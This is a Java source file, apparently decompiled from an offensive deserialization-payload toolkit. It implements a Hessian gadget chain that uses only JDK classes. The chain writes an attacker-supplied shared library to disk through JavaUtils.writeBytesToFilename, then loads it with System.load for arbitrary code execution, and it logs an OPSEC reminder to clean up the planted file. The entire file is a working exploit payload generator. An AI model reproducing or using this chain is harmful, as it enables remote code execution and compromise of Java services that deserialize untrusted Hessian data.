package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.FileHelper;
import com.ar3h.chains.common.util.PayloadHelper;
import java.util.LinkedList;
import javax.swing.UIDefaults;
import org.apache.commons.codec.binary.Base64;
import org.apache.myfaces.shared.renderkit.ClientBehaviorEvents;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import sun.swing.SwingLazyValue;

@GadgetAnnotation(name = "写库文件和加载动态链接库的代码执行链", description = "使用JavaUtils写入dylib文件，之后再配合System.load进行加载动态链接库，实现任意代码执行\n优先使用Base64编码", dependencies = {"only jdk"})
@GadgetTags(tags = {Tag.HessianDeserialize, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/jdk/SystemLoad.class */
public class SystemLoad implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) SystemLoad.class);

    @Param(name = "写入的文件路径")
    public String path = "tmp123";

    @Param(name = "动态链接库文件Base64格式", description = "Base64编码的二进制so文件", requires = false)
    public String fileBase64;

    @Param(name = "本地动态链接库文件路径", requires = false)
    public String localPath;

    public Object getObject() throws Exception {
        log.warn("[OPSEC] need to clean in target file: {}", this.path);
        byte[] bArr = null;
        if (this.fileBase64 != null && !this.fileBase64.isEmpty()) {
            bArr = Base64.decodeBase64(this.fileBase64);
        } else if (this.localPath == null || this.localPath.isEmpty()) {
            ThrowsUtil.throwNotFoundOptionGadgetException("'fileBase64' or 'localPath'");
        } else {
            bArr = FileHelper.fileGetContent(this.localPath);
        }
        SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{this.path, bArr});
        SwingLazyValue swingLazyValue2 = new SwingLazyValue("java.lang.System", ClientBehaviorEvents.LOAD, new Object[]{this.path});
        LinkedList linkedList = new LinkedList();
        linkedList.add(getMap(swingLazyValue));
        linkedList.add(getMap(swingLazyValue2));
        return linkedList;
    }

    public Object getMap(SwingLazyValue swingLazyValue) throws Exception {
        UIDefaults uIDefaults = new UIDefaults();
        UIDefaults uIDefaults2 = new UIDefaults();
        uIDefaults.put("gadget-chains", swingLazyValue);
        uIDefaults2.put("gadget-chains", swingLazyValue);
        return PayloadHelper.makeMap(uIDefaults, uIDefaults2);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
